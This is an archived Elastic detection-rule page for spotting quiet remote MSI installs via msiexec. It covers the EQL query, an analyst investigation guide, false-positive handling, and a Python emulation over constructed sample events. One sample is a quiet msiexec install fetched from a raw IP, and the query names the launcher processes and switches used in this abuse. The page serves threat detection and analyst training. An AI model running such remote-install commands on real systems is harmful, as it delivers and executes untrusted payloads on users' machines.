IMPORTANT: This documentation is no longer updated. Refer to Elastic's version policy and the latest documentation.

Potential Remote Install via MsiExec


Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers for initial access and delivery of malware.

Rule type: eql

Rule indices:

  • endgame-*
  • logs-crowdstrike.fdr*
  • logs-endpoint.events.process-*
  • logs-m365_defender.event-*
  • logs-sentinel_one_cloud_funnel.*
  • logs-system.security*
  • logs-windows.forwarded*
  • logs-windows.sysmon_operational-*
  • winlogbeat-*

Severity: high

Risk score: 73

Runs every: 5m

Searches indices from: now-9m (Date Math format, see also Additional look-back time)

Maximum alerts per execution: 100

References: None

Tags:

  • Domain: Endpoint
  • OS: Windows
  • Use Case: Threat Detection
  • Tactic: Defense Evasion
  • Data Source: Elastic Endgame
  • Data Source: Elastic Defend
  • Data Source: Windows Security Event Logs
  • Data Source: Microsoft Defender XDR
  • Data Source: Sysmon
  • Data Source: SentinelOne
  • Data Source: Crowdstrike
  • Resources: Investigation Guide

Version: 5

Rule authors:

  • Elastic

Rule license: Elastic License v2

Investigation guide


Triage and analysis

Investigating Potential Remote Install via MsiExec

Possible investigation steps

  • What remote installer behavior is preserved in the alert?
      • Focus: process.command_line, process.parent.name, and process.parent.command_line, especially quiet install or patch switches, the remote MSI or TRANSFORMS= source, and HTTP, raw-IP, public-hosting, or recognized distribution sources.
      • Implication: escalate for quiet remote installs, remote MSTs, or patches from suspicious infrastructure under interactive or script-launcher parents; lower concern only when the command, source, and parent match one recurring deployment, repair, or onboarding pattern.
  • Is the msiexec binary identity expected for Windows Installer?
      • Focus: process.executable, process.pe.original_file_name, process.code_signature.subject_name, process.code_signature.trusted, and process.hash.sha256.
      • Implication: escalate faster when msiexec is renamed, unsigned, untrusted, newly seen, or in a user-writable path; a trusted Microsoft identity only confirms the proxy binary, not the remote install.
  • Do the parent and ancestry explain why msiexec ran?
      • Focus: process.parent.executable, process.parent.command_line, process.Ext.ancestry, user.id, and the affected host.
      • Implication: escalate when browser-adjacent, script, shell, WMI, or unusual interactive ancestry invokes the remote package without a stable workflow; lower concern when the parent, user, and host pattern fits a recognized management or support path.
  • Do process events show payload execution after the installer starts?
      • Focus: child starts on the same host.id where process.parent.entity_id matches process.entity_id, checking child process.command_line, process.executable, and process.hash.sha256.
      • Investigate action "Child process activity from msiexec": host.id = {{host.id}}, process.parent.entity_id = {{process.entity_id}}, event.category = process, event.type = start; window now-1h to now.
      • Hint: use host.id + process.pid + a tight alert window only when entity linkage is unavailable, and treat the result as weaker.
      • Implication: escalate when msiexec spawns shells, script interpreters, LOLBins, scheduled-task tools, or user-space binaries tied to the remote package; lower concern when follow-on activity stays inside the same signed product install flow.
  • Do the remote source and workflow context fit one legitimate package path?
      • Focus: URL, host, package name, or remote TRANSFORMS= in process.command_line, plus process.parent.executable, user.id, and host.id context for that source.
      • Hint: if network or file telemetry exists, correlate destination or artifact evidence with host.id + process.entity_id; use host.id + process.pid + a tight alert window only without entity linkage. Missing file or network telemetry is unresolved, not benign, and does not block escalation when process evidence is strong.
      • Investigate action "File or network activity by msiexec": host.id = {{host.id}}, process.entity_id = {{process.entity_id}}, and event.category = file, or the same host.id and process.entity_id with event.category = network; window now-1h to now.
      • Implication: escalate when the source is raw IPs, public file hosting, look-alike vendors, temp/download staging, or infrastructure unrelated to the expected product; lower concern when source, launcher, user-host scope, and recovered corroboration fit one internal distribution point or vendor service.
  • Escalate on suspicious quiet-install intent, mismatched identity or lineage, an unfit package source, or payload child execution; close only when process evidence and recovered corroboration align to one exact deployment, repair, or support workflow; preserve and escalate when evidence is mixed or visibility is incomplete. Use same-user or same-host related alerts after escalation only to size scope, not to prove the local alert.
      • Investigate action "Alerts associated with the user": event.kind = signal, user.id = {{user.id}}; window now-48h/h to now.
      • Investigate action "Alerts associated with the host": event.kind = signal, host.id = {{host.id}}; window now-48h/h to now.

False positive analysis

  • First check whether http: or https: follows /i or /p directly (remote source — investigate) or sits inside a PROPERTY= value while the MSI source is local or relative (configuration URL — likely benign). The rule excludes local C:\ sources after /i; UNC, relative-path, or other local sources with property URLs need manual confirmation or customer-side exceptions.
  • Legitimate deployment, patching, or agent-repair workflows can use quiet remote msiexec. Confirm when process.command_line, process.parent.executable, user.id, and host.id align to one recurring product path. Do not close on a vendor-looking URL, signed msiexec, or familiar parent name alone.
  • Build exceptions from process.parent.executable, package source pattern in process.command_line, and stable host.id or user.id cohort. Avoid exceptions on msiexec, process.parent.name, domain suffix, or user.name alone.

Response and remediation

  • If confirmed benign, reverse any temporary containment and record the installer command, remote package source, parent launcher, signer/hash identity, affected user.id, affected host.id, and any recovered destination or artifact pattern. Create an exception only after the same workflow recurs across prior alerts from this rule.
  • If suspicious but unconfirmed, preserve the alert record, process tree, process.entity_id values, installer command line, remote URL or TRANSFORMS= value, parent command line, child process records, and any recovered package, destination, or provenance artifacts before containment. Apply reversible controls only when command, parent, or child-process evidence suggests active delivery; otherwise keep evidence collection open rather than starting cleanup.
  • If confirmed malicious, preserve process identifiers, command lines, recovered packages, and destination indicators before isolating the host, terminating msiexec or follow-on payloads, blocking confirmed indicators, or removing staged installers, extracted payloads, persistence changes, or scheduled-task material tied to the chain.
  • Post-incident hardening: close the delivery path that introduced the remote package, restrict msiexec remote-install use to controlled deployment tooling where feasible, review hosts where installer-elevation policy would increase impact, and document adjacent variants such as remote TRANSFORMS= abuse or DLL registration through /y and /z.

Setup


Setup

This rule is designed for data generated by Elastic Defend, which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules.

Setup instructions: https://ela.st/install-elastic-defend

Additional data sources

This rule also supports the following third-party data sources. For setup instructions, refer to the links below:

Rule query

process where host.os.type == "windows" and event.type == "start" and
  process.name : "msiexec.exe" and process.args : ("-i*", "/i*", "-p*", "/p*") and
  process.command_line : ("*http:*", "*https:*") and
  process.args : ("/qn", "-qn", "-q", "/q", "/quiet") and
  process.parent.name : (
    "sihost.exe", "explorer.exe", "cmd.exe", "wscript.exe", "mshta.exe",
    "powershell.exe", "wmiprvse.exe", "pcalua.exe", "forfiles.exe", "conhost.exe"
  ) and

  not process.command_line : (
        "*--set-server=*", "*UPGRADEADD=*", "*--url=*", "*USESERVERCONFIG=*", "*RCTENTERPRISESERVER=*",
        "*app.ninjarmm.com*", "*zoom.us/client*", "*SUPPORTSERVERSTSURI=*", "*START_URL=*", "*AUTOCONFIG=*",
        "*awscli.amazonaws.com*", "*/i \"C:*", "*/i C:\\*"
  )
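As an added example that is not part of Elastic's rule or documentation, the following Python emulates the rule query's conditions over constructed process-start events and applies the check from the false positive analysis above (a URL directly after /i or /p versus a URL inside a PROPERTY= value). It approximates process.args by splitting the command line on whitespace with quoted tokens kept whole, treats the EQL `:` wildcard operator as a case-insensitive fnmatch, and uses documentation-reserved addresses and domains in its samples; these are assumptions, not the detection engine's behaviour.

```python
import re
from fnmatch import fnmatch

# Pattern lists copied from the rule query on this page.
INSTALL_FLAGS = ("-i*", "/i*", "-p*", "/p*")
QUIET_FLAGS = ("/qn", "-qn", "-q", "/q", "/quiet")
PARENTS = ("sihost.exe", "explorer.exe", "cmd.exe", "wscript.exe", "mshta.exe",
           "powershell.exe", "wmiprvse.exe", "pcalua.exe", "forfiles.exe", "conhost.exe")
EXCLUSIONS = ("*--set-server=*", "*UPGRADEADD=*", "*--url=*", "*USESERVERCONFIG=*",
              "*RCTENTERPRISESERVER=*", "*app.ninjarmm.com*", "*zoom.us/client*",
              "*SUPPORTSERVERSTSURI=*", "*START_URL=*", "*AUTOCONFIG=*",
              "*awscli.amazonaws.com*", '*/i "C:*', "*/i C:\\*")

def split_args(command_line):
    """Approximate process.args: split on whitespace, keep "quoted" tokens whole, drop quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command_line)]

def any_match(value, patterns):
    """Emulate the EQL ':' operator: case-insensitive wildcard match against any pattern."""
    return any(fnmatch(value.lower(), p.lower()) for p in patterns)

def matches_rule(event):
    """Apply the rule's EQL conditions to one process-start event given as a dict of ECS fields."""
    cmd, args = event["process.command_line"], split_args(event["process.command_line"])
    return (event["host.os.type"] == "windows" and event["event.type"] == "start"
            and event["process.name"].lower() == "msiexec.exe"
            and any(any_match(a, INSTALL_FLAGS) for a in args)
            and any_match(cmd, ("*http:*", "*https:*"))
            and any(a.lower() in QUIET_FLAGS for a in args)
            and event["process.parent.name"].lower() in PARENTS
            and not any_match(cmd, EXCLUSIONS))

def classify_source(command_line):
    """'remote' if a URL follows /i or /p; 'property_url' if it only sits in a KEY=value; else 'local'."""
    args = split_args(command_line)
    for flag, nxt in zip(args, args[1:]):
        if flag.lower() in ("/i", "-i", "/p", "-p") and re.match(r"https?:", nxt, re.I):
            return "remote"
    if any("=" in a and re.search(r"https?:", a.split("=", 1)[1], re.I) for a in args):
        return "property_url"
    return "local"

def ev(parent, cmd):  # constructed sample process-start event, not real telemetry
    return {"host.os.type": "windows", "event.type": "start", "process.name": "msiexec.exe",
            "process.parent.name": parent, "process.command_line": cmd}
SAMPLE_EVENTS = [  # 203.0.113.10 and example.com are documentation-reserved values
    ev("powershell.exe", "msiexec.exe /i http://203.0.113.10/update.msi /qn"),          # fires, remote
    ev("explorer.exe", 'msiexec.exe /i "C:\\Temp\\agent.msi" START_URL=https://portal.example.com /quiet'),  # excluded
    ev("cmd.exe", "msiexec.exe /i agent.msi SERVERURL=https://rmm.example.com /qn"),    # fires, needs review
]
```

The third sample shows the case the false positive analysis calls out: a relative MSI source with a property URL still matches the query, so the analyst confirms the source manually rather than closing on the vendor-looking hostname.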

Framework: MITRE ATT&CK™